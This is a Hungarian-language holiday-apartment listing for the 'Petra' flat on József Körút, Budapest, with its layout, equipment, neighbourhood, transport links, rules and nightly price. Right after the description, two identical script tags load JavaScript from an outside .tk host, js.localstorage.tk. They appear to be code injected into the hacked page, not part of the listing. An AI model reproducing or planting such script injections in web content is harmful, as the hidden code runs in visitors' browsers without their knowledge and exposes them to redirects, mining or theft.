Körúti Apartmanok Budapest, Petra Szállás

  • Bathroom

Kiadó Budapesti szállás-lakás cím: Budapest VIII kerület József Körút 47, a HARMINCKETTESEK TERE megállónál, férőhelyek: 1-5 személy. Áll: másfél szoba, fürdő, külőn WC, hall és konyha, alapterülete 42 m2. felújítás éve: május 2013., felszerelt, udvari-utcai lakás, liftes épületben. Közel vannak a: Transzplantációs, Szem, Bőr, Szív, Fogászati Klinikák, Nemzeti Múzeum, Iparművészeti Múzeum, Andrássy Egyetem, Színművészeti Főiskola, ELTE,.a Horánszky utcai Egészségügyi Továbbképző. A szállás egy 1898 ban épült házban található, a kerület sétáló utca sarkán.
Igénybe vehető: 20./XII./2014.-tól.
Az Aliz, Klára Albert és Petra lakások ugyan abban az épületben vannak (a földszinten, I., II., és III. emeleten), mindegyik alkalmas 1-4 személy elszállásolására. Ebben az épületben akár 20 személyt is tudunk elszállásolni.
Felszerelés:
Fekvőhelyek: két személyes kanapé 2 darab, egyszemélyes kanapé 1 darab. Ágynemű és törölköző biztosított, Indukciós tűzhely, Műholdas TV, Mikró, Hűtő, Kávéfőző, Kenyérpirító, Zuhanyzós fürdő, Porszívó, Ventilátor, Kaputelefon, Hajszárító, Wi-Fi (ingyenes), Liftes épület.
A Környék:
Lakásunk a Józsefváros Palota Negyedében található ;egy városképi védelem alatt álló, 1898.-ban épült eklektikus palotában, a József Kőrút és a Krúdy Gyula utca sarkán.A Petra jelű apartman az épület II emeletén van, udvari-utcai, világos szép lakás, melyet a tulajdonos 2013.-ban újított fel!
Remek közlekedés, 4 és 6 villamos a ház előtt (HARMINCKETTESEK TERE megálló), a piros és a kék metró 5-10 percre van (CORVIN SÉTÁNY, Kőrút Kálvin tér illetve, Blaha Lujza tér), a 109 busz és a 83 troli a József kőrút-Baross utca sarkán található. Közel egyéb fontos látványosság: a Duna Korzó, Gellért Fürdő, Váci utca Nagy Csarnok, hajó állomás, tömegközlekedéssel könnyen elérhetők a: Hősök tere, a Széchenyi Fürdő, a Parlament, Szent István Bazilika. Közel a Szabó Ervin Könyvtár, a Váci és a Ráday, utca, sok kiváló szórakozó hely. A Krúdy Gyula utca 2009.-től sétáló utca lett. Közért a sarkon, vendéglők, bankok, éjjel-nappali közért, patika, egyéb üzletek mind a közelben.
Megjegyzés:
Lakásainkba házi állatot, a tulajdonos előzetes hozzájárulásával bevihető.
Az ügyfél kérésére, transzfert biztosítunk a repülőtérről, NÉPLIGET Busz pu., Keleti pu, etc..
Nem dohányzó apartman!
Legrövidebb foglalási idő: 2 nap.
Áraink tartalmazzák az ÁFÁ.-t. Az idegenforgalmi adót áraink nem tartalmazzák. A nettó szállásdíj 4%. val egyenlő és a helyszinen kell kifizetni.
Beszélünk: English, Français, Deutsch, Magyar, Italiano, Română.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Type: 
szállás
Size: 
42 m2
Floor: 
2. floor
Rooms: 
1
Half rooms: 
1
Beds: 
4
Cím: 
Budapest VIII., József Körút körút
Price: 
10500.00 Ft / night
Phone: 
+36 309-148-459
E-mail: 
Skype: 
Properties: 
Névjegy: 
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.